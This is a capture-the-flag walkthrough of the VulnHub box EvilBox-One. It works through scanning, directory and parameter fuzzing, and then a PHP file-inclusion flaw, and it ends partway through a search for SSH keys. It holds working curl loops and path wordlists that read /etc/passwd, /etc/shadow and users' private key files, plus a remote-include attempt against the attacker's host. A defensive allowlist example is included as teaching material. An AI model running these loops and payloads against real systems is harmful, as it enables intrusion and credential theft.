Target machine: EvilBox---One
Preparation
- Target image: https://download.vulnhub.com/evilbox/EvilBox---One.ova
- MD5 checksum: c3a65197b891713731e6bb791d7ad259
  - Verify from cmd: certutil -hashfile <file path> MD5
  - Verify from PowerShell: Get-FileHash <file path> -Algorithm MD5 | Format-List
- Hypervisor: VirtualBox
- Network: Host-Only
- Network setup guide: https://www.cnblogs.com/shadow-/p/16815020.html
  - kali: NAT + [ Bridged/Host-Only ]
Walkthrough
Target discovery
Use the usual tools:
- arp-scan
- nmap
- netdiscover
- fping
For the initial sweep use sudo arp-scan -l -I eth1. The other scanners are each limited in one way or another by comparison; nmap is better suited to a deeper scan once the target has been pinned down.
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1	0a:00:27:00:00:0d	(Unknown: locally administered)
192.168.56.100	08:00:27:15:0f:e5	PCS Systemtechnik GmbH
192.168.56.117	08:00:27:4d:bc:dd	PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded
192.168.56.1 and 192.168.56.100 are the gateway and the DHCP server respectively, so the target is 192.168.56.117.
Run a standard nmap scan against it: nmap -A -T4 192.168.56.117
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST
Nmap scan report for 192.168.56.117
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4495500be473a18511ca10ec1ccbd426 (RSA)
|   256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_  256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
- Port 22 is open, running OpenSSH 7.9p1
- Port 80 is open, running Apache/2.4.38
- The operating system is Linux, Debian
- Leave SSH aside for now
  - no password and no key
  - no intelligence of any kind
- Start with HTTP on port 80 instead: even if it cannot be broken, it may yield information usable for brute-forcing SSH
Web attack
First visit http://192.168.56.117:80/ in Firefox for an initial probe.
- It is only the default Apache2 Debian page, with essentially no usable information.
Use a web content discovery tool to crawl the site for hidden pages. Recommended tools:
- dirsearch
- dirb
- dirbuster
- gobuster
- feroxbuster
- ffuf
- wfuzz
We use dirsearch --url='192.168.56.117:80/'
┌──(kali㉿kali)-[~]
└─$ dirsearch --url='192.168.56.117:80/'

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log

Target: http://192.168.56.117:80/

[09:52:49] Starting: 
[09:52:52] 403 -  279B  - /.ht_wsr.txt
[09:52:52] 403 -  279B  - /.htaccess.bak1
[09:52:52] 403 -  279B  - /.htaccess.sample
[09:52:52] 403 -  279B  - /.htaccess.save
[09:52:52] 403 -  279B  - /.htaccess_extra
[09:52:52] 403 -  279B  - /.htaccess_orig
[09:52:52] 403 -  279B  - /.htaccess_sc
[09:52:52] 403 -  279B  - /.htaccess.orig
[09:52:52] 403 -  279B  - /.htaccessOLD
[09:52:52] 403 -  279B  - /.htaccessOLD2
[09:52:52] 403 -  279B  - /.htpasswds
[09:52:52] 403 -  279B  - /.html
[09:52:52] 403 -  279B  - /.htm
[09:52:52] 403 -  279B  - /.htpasswd_test
[09:52:52] 403 -  279B  - /.httr-oauth
[09:52:52] 403 -  279B  - /.htaccessBAK
[09:52:54] 403 -  279B  - /.php
[09:53:51] 200 -   10KB - /index.html
[09:54:23] 200 -   12B  - /robots.txt
[09:54:25] 200 -    4B  - /secret/
[09:54:25] 301 -  317B  - /secret  ->  http://192.168.56.117/secret/
[09:54:25] 403 -  279B  - /server-status
[09:54:25] 403 -  279B  - /server-status/
- /index.html is clearly the Apache2 Debian default page seen earlier; no value.
- /robots.txt normally carries the robots protocol and may be of some value.
  - The robots protocol (also called the crawler protocol or crawler rules) lets a site publish a robots.txt file that tells search engines which pages may be crawled and which may not; a search engine reads robots.txt to decide whether a page is allowed to be crawled.
  - But the robots protocol is not a firewall and has no enforcement power; a search engine can ignore robots.txt entirely and crawl the pages anyway.
- /secret is a directory and may need further exploration.
First look at http://192.168.56.117:80/robots.txt to see what is there.
- It contains a single line: Hello H4x0r
  - Background: H4x0r stands for Hacker; it is a piece of l33t speak, the hacker argot, in which H4x0r means Hacker.
  - This is probably a taunt aimed at the intruder and has little value by itself, but a password or account name might be related to H4x0r, so we note it for now.
- A robots.txt with near-empty content like this serves an anti-crawler purpose.
What remains of value is the /secret directory, so run a second round of content discovery against it: dirsearch --url='192.168.56.117:80/secret'
- dirsearch finds nothing, so try a different wordlist:
  dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp
  - --wordlists= specifies the wordlist; seclists is a wordlist collection packaged for kali and can be installed directly if it is missing.
  - -e specifies the file extensions to search for.
  - The brute-force can be slow. If the kali VM has enough CPU cores and memory this is no concern; if its resources are limited, use gobuster instead:
    gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
    dirsearch is written in Python, with the speed that implies; gobuster is written in Go and runs at close to C speed.
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.117:80/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,php,html,jsp
[+] Timeout:                 10s
===============================================================
2022/11/09 19:35:29 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/evil.php             (Status: 200) [Size: 0]
Progress: 708415 / 708545 (99.98%)
===============================================================
2022/11/09 19:42:23 Finished
===============================================================
- For web directory brute-forcing the tool is not what matters; the choice of wordlist is.
- The result, /evil.php, is our new lead.
Try visiting /evil.php: nothing is shown, and the page source is empty as well. We can guess that this page is a script used to process data, in which case it must accept request parameters for any data exchange to happen. Next step: parameter brute-forcing.
Here we use ffuf.
- For the parameter wordlist we use the classic kali seclists.
- The value wordlist we build ourselves, var.txt (one value per line):
  0 1 a ' " ( [ { < , ; ? ` / \ % ture false ../robots.txt H4x0r
  The idea behind it is educated guessing: values that trigger vulnerabilities, generic content, files known to exist, and gathered information.
  - Numeric: 0, 1 stand for a number or a boolean, the classic probe
  - Letters: a stands for a single letter, a string or a word
  - Unbalanced delimiters: ', ", (, [, {, <
  - Special characters: , ; ? ` / \ %
  - Boolean forms: ture, false
  - File-inclusion type: ../robots.txt, a file we know exists and whose content is simple and easy to recognise in a response
  - Gathered information: H4x0r
Build the ffuf command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0
- -w specifies a wordlist; when combining wordlists the format is wordlist path:keyword
- -u specifies the URL to fuzz
- -fs filters responses by HTTP body size; here responses of size 0 are dropped outright
┌──(kali㉿kali)-[~/workspace]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.117/secret/evil.php?params=var
 :: Wordlist         : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Wordlist         : var: ./var.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]
    * params: command
    * var: ../robots.txt

:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
- The result shows that the parameter is command
- and the value is ../robots.txt, which indicates that /evil.php performs file inclusion
To test the behaviour of /evil.php further, build the request http://192.168.56.117/secret/evil.php?command=../robots.txt. Opening it in Firefox and viewing the source, the returned content is plain and identical to /robots.txt, so the inclusion simply returns the file as-is. Anyone who has studied PHP will recognise a PHP file inclusion vulnerability; that is where we start.
- Check whether the include accepts remote files; if it does, a webshell could be served and used to log in directly.
  ┌──(kali㉿kali)-[~/workspace]
  └─$ ls
  var.txt

  ┌──(kali㉿kali)-[~/workspace]
  └─$ python3 -m http.server 80
  Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  -- separator --

  ┌──(kali㉿kali)-[~]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"
  - Remote inclusion is not supported.
- Check whether PHP's built-in URL-style wrappers can be used; if so, a webshell could be written directly.
  ┌──(kali㉿kali)-[~/workspace]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"
  SGVsbG8gSDR4MHIK

  ┌──(kali㉿kali)-[~]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/write/resource=../robots.txt&txt=1"
  Hello H4x0r

  ┌──(kali㉿kali)-[~]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                   Dload  Upload   Total   Spent    Left  Speed
  100    92  100    92    0     0   8532      0 --:--:-- --:--:-- --:--:--  9200
  <?php
      $filename = $_GET['command'];
      include($filename);
  ?>
  - php:// can be used to read the various IO streams
  - but no data can be written
  - By reading through the base64 encoding filter we can peek at evil.php itself; it turns out to be nothing more than a simple file include, the three lines decoded above.
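The include decoded above is the root of everything that follows: `include($_GET['command'])` with no check at all, so any readable file, traversal path or php:// wrapper is included. As an added example (not the box's code, and written in Python rather than PHP as a model of the same check), here is how the include target should have been resolved: only a bare allowlisted name, mapped under a fixed directory, with the real path checked to stay inside that directory. The allowlist names and the throwaway directory are assumptions; the probes are the ones this walkthrough sent.

```python
import os
import tempfile
from typing import Dict, Optional

# Hypothetical allowlist: the only page fragments evil.php should ever include.
ALLOWED = {"header", "footer"}


def resolve_include(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute file to include, or None to reject the request.

    Rejections, in order: empty values and anything containing a path
    separator (so '../robots.txt', '/etc/passwd' and 'php://filter/...'
    never reach the filesystem), names outside the allowlist, allowlisted
    names whose real path escapes base_dir through a symlink, and names
    that are on the allowlist but missing on disk.
    """
    if not requested or requested != os.path.basename(requested):
        return None
    if requested not in ALLOWED:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target if os.path.isfile(target) else None


def demo() -> Dict[str, bool]:
    """Run the walkthrough's probes and two legitimate names through the check
    in a throwaway include directory; True means the include would happen."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "header.php"), "w") as fh:
            fh.write("<?php echo 'header'; ?>")
        # Present on disk but deliberately not on the allowlist.
        with open(os.path.join(tmp, "secret.php"), "w") as fh:
            fh.write("<?php /* must not be includable by name */ ?>")
        probes = [
            "header",                      # allowlisted and present
            "footer",                      # allowlisted but missing
            "secret",                      # present but not allowlisted
            "../robots.txt",               # traversal, as found by ffuf
            "/etc/passwd",                 # absolute path
            "php://filter/read=convert.base64-encode/resource=./evil.php",
            "http://192.168.56.116:80/var.txt",  # remote include attempt
            "",
        ]
        return {p: resolve_include(tmp, p) is not None for p in probes}


if __name__ == "__main__":
    for probe, included in demo().items():
        print(("include " if included else "reject  ") + repr(probe))
```

The same shape carries over to PHP: compare the raw value against a fixed array of names before touching `realpath()`, then build the path yourself rather than passing user input to `include`. In PHP the `allow_url_include` setting (already off on this box, which is why the remote probe failed) only covers the remote case; it does nothing against traversal or `php://filter`.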
- Check whether the include can read sensitive system files directly, and keep gathering information to find a way in.
  - The usual suspects are /etc/passwd, /etc/shadow, /etc/sudoers, */.ssh/authorized_keys ...
  Build a wordlist, file.txt (one path per line):
/apache/apache/conf/httpd.conf /apache/apache2/conf/httpd.conf /apache/php/php.ini /bin/php.ini /etc/anacrontab /etc/apache/apache.conf /etc/apache/httpd.conf /etc/apache2/apache.conf /etc/apache2/httpd.conf /etc/apache2/sites-available/default /etc/apache2/vhosts.d/00_default_vhost.conf /etc/at.allow /etc/at.deny /etc/cron.allow /etc/cron.deny /etc/crontab /etc/fstab /etc/host.conf /etc/httpd/conf.d/httpd.conf /etc/httpd/conf.d/php.conf /etc/httpd/conf/httpd.conf /etc/httpd/htdocs/index.html /etc/httpd/htdocs/index.php /etc/httpd/logs/access.log /etc/httpd/logs/access_log /etc/httpd/logs/error.log /etc/httpd/logs/error_log /etc/httpd/php.ini /etc/init.d/httpd /etc/init.d/mysql /etc/ld.so.conf /etc/motd /etc/my.cnf /etc/mysql/my.cnf /etc/mysql/my.cnf /etc/network/interfaces /etc/networks /etc/passwd /etc/php.ini /etc/php/apache/php.ini /etc/php/apache2/php.ini /etc/php/cgi/php.ini /etc/php/php.ini /etc/php/php4/php.ini /etc/php4.4/fcgi/php.ini /etc/php4/apache/php.ini /etc/php4/apache2/php.ini /etc/php4/cgi/php.ini /etc/php5/apache/php.ini /etc/php5/apache2/php.ini /etc/php5/cgi/php.ini /etc/phpmyadmin/config.inc.php /etc/resolv.conf /etc/shadow /etc/ssh/sshd_config /etc/ssh/ssh_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/ssh/ssh_host_key.pub /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_rsa_key.pub /etc/ssh/ssh_host_rsa_key.pub /etc/sysconfig/network /etc/sysconfig/network /home/apache/conf/httpd.conf /home/apache2/conf/httpd.conf /home/bin/stable/apache/php.ini /home2/bin/stable/apache/php.ini /NetServer/bin/stable/apache/php.ini /opt/www/conf/httpd.conf /opt/www/htdocs/index.html /opt/www/htdocs/index.php /opt/xampp/etc/php.ini /PHP/php.ini /php/php.ini /php4/php.ini /php5/php.ini /root/.atftp_history /root/.bashrc /root/.bash_history /root/.mysql_history /root/.nano_history 
/root/.php_history /root/.profile /root/.ssh/authorized_keys /root/.ssh/identity /root/.ssh/identity.pub /root/.ssh/id_dsa /root/.ssh/id_dsa.pub /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/anaconda-ks.cfg /tmp/apache/htdocs/index.html /tmp/apache/htdocs/index.php /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/php.ini /usr/local/apache/htdocs/index.html /usr/local/apache/htdocs/index.php /usr/local/apache/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access_logaccess_log.old /usr/local/apache/logs/error.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error_logerror_log.old /usr/local/apache2/conf/httpd.conf /usr/local/apache2/conf/php.ini /usr/local/apache2/htdocs/index.html /usr/local/apache2/htdocs/index.php /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/stats_log /usr/local/etc/php.ini /usr/local/httpd/conf/httpd.conf /usr/local/httpd2.2/htdocs/index.html /usr/local/httpd2.2/htdocs/index.php /usr/local/lib/php.ini /usr/local/mysql/bin/mysql /usr/local/mysql/my.cnf /usr/local/php/lib/php.ini /usr/local/php4/lib/php.ini /usr/local/php4/lib/php.ini /usr/local/php4/php.ini /usr/local/php5/etc/php.ini /usr/local/php5/lib/php.ini /usr/local/php5/php5.ini /usr/local/share/examples/php/php.ini /usr/local/share/examples/php4/php.ini /usr/local/tomcat5527/bin/version.sh /usr/local/Zend/etc/php.ini /usr/share/tomcat6/bin/startup.sh /usr/tomcat6/bin/startup.sh /var/apache2/config.inc /var/httpd/conf/httpd.conf /var/httpd/conf/php.ini /var/httpd/conf/php.ini /var/httpd/htdocs/index.html /var/httpd/htdocs/index.php /var/lib/mysql/my.cnf /var/lib/mysql/mysql/user.MYD /var/local/www/conf/httpd.conf /var/local/www/conf/php.ini /var/log/access.log /var/log/access_log /var/log/apache/access.log /var/log/apache/access_log 
/var/log/apache/error.log /var/log/apache/error_log /var/log/apache2/access.log /var/log/apache2/access_log /var/log/apache2/error.log /var/log/apache2/error_log /var/log/error.log /var/log/error_log /var/log/mysql.log /var/log/mysql/mysql-bin.log /var/log/mysql/mysql-slow.log /var/log/mysql/mysql.log /var/log/mysqlderror.log /var/mail/root /var/mysql.log /var/spool/cron/crontabs/root /var/spool/mail/root /var/www/conf/httpd.conf /var/www/htdocs/index.html /var/www/htdocs/index.php /var/www/index.html /var/www/index.php /var/www/logs/access.log /var/www/logs/access_log /var/www/logs/error.log /var/www/logs/error_log /web/conf/php.ini /www/conf/httpd.conf /www/htdocs/index.html /www/htdocs/index.php /www/php/php.ini /www/php4/php.ini /www/php5/php.ini /xampp/apache/bin/php.ini /xampp/apache/conf/httpd.conf root/.ssh/authorized_keys root/.ssh/identity root/.ssh/identity.pub root/.ssh/id_dsa root/.ssh/id_dsa.pub root/.ssh/id_rsa root/.ssh/id_rsa.pub
The brute-force loop, as a bash script:
for i in $(cat ./file.txt); do echo ">>>$i:"; curl "http://192.168.56.117/secret/evil.php?command=$i"; done
The results below have been cleaned up: duplicates, empty responses and files with default content have been removed.
┌──(kali㉿kali)-[~/workspace]
└─$ for i in $(cat ./file.txt)
for> do
for> echo ">>>$i:"
for> curl "http://192.168.56.117/secret/evil.php?command=$i"
for> done
>>>/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
>>>/etc/resolv.conf:
domain home
search home
nameserver 192.168.1.1
>>>/etc/ssh/sshd_config:
#	$OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile	.ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
PrintLastLog no
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem	sftp	/usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#	X11Forwarding no
#	AllowTcpForwarding no
#	PermitTTY no
#	ForceCommand cvs server
>>>/etc/ssh/ssh_config:

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne
The files that returned content:
- /etc/crontab: default content
- /etc/fstab: default content
- /etc/host.conf: default content
- /etc/ld.so.conf: default content
- /etc/network/interfaces: default content
- /etc/networks: not useful
- /etc/passwd
- /etc/resolv.conf: not useful
- /etc/ssh/sshd_config: default content
- /etc/ssh/ssh_config: default content
- /etc/ssh/ssh_host_rsa_key.pub
New details discovered:
- /etc/passwd: we now know there is another user named mowree
- /etc/ssh/ssh_host_rsa_key.pub: an SSH login lead, and the key comment points to root@EvilBoxOne
The information is still insufficient, but mowree is a new lead: check whether that user has any .ssh login material. Build a simple SSH guessing wordlist, ssh_dict.txt, modelled on the /etc/ssh/ssh_host_rsa_key.pub we found to exist:
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/ssh_host_dsa_key
/root/.ssh/ssh_host_dsa_key.pub
/root/.ssh/ssh_host_key
/root/.ssh/ssh_host_key.pub
/root/.ssh/ssh_host_rsa_key
/root/.ssh/ssh_host_rsa_key.pub
/home/mowree/.ssh/authorized_keys
/home/mowree/.ssh/identity
/home/mowree/.ssh/identity.pub
/home/mowree/.ssh/id_dsa
/home/mowree/.ssh/id_dsa.pub
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/id_rsa.pub
/home/mowree/.ssh/ssh_host_dsa_key
/home/mowree/.ssh/ssh_host_dsa_key.pub
/home/mowree/.ssh/ssh_host_key
/home/mowree/.ssh/ssh_host_key.pub
/home/mowree/.ssh/ssh_host_rsa_key
/home/mowree/.ssh/ssh_host_rsa_key.pub
- Attack script:
  for i in $(cat ./ssh_dict.txt); do echo "输出 >>>$i:"; curl "http://192.168.56.117/secret/evil.php?command=$i"; done
- Result:
输出 >>>/root/.ssh/authorized_keys:
输出 >>>/root/.ssh/identity:
输出 >>>/root/.ssh/identity.pub:
输出 >>>/root/.ssh/id_dsa:
输出 >>>/root/.ssh/id_dsa.pub:
输出 >>>/root/.ssh/id_rsa:
输出 >>>/root/.ssh/id_rsa.pub:
输出 >>>/root/.ssh/ssh_host_dsa_key:
输出 >>>/root/.ssh/ssh_host_dsa_key.pub:
输出 >>>/root/.ssh/ssh_host_key:
输出 >>>/root/.ssh/ssh_host_key.pub:
输出 >>>/root/.ssh/ssh_host_rsa_key:
输出 >>>/root/.ssh/ssh_host_rsa_key.pub:
输出 >>>/home/mowree/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
输出 >>>/home/mowree/.ssh/identity:
输出 >>>/home/mowree/.ssh/identity.pub:
输出 >>>/home/mowree/.ssh/id_dsa:
